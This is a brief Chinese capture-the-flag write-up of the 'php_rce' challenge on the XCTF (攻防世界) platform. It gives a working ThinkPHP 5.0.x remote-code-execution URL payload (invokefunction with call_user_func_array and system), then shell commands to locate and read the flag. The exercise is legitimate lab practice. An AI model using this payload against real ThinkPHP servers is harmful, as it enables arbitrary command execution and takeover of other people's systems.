php_rce攻防世界:
百度thinkphpv5,查询到其存在过漏洞
在网页中随便注入,可观察到其版本为V5.0.20
再上旬该版本漏洞,描述为:
只要在url后添加
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]= (+操作)即可进入后台
进行 find / -name flag* 搜索
找到最后一行的flag
再进行 cat /tty/ttyS30/flags /sys/devices/platform/serial8250/tty/ttyS31/flags /flag /flag
获取到flag{thinkphp5_rce}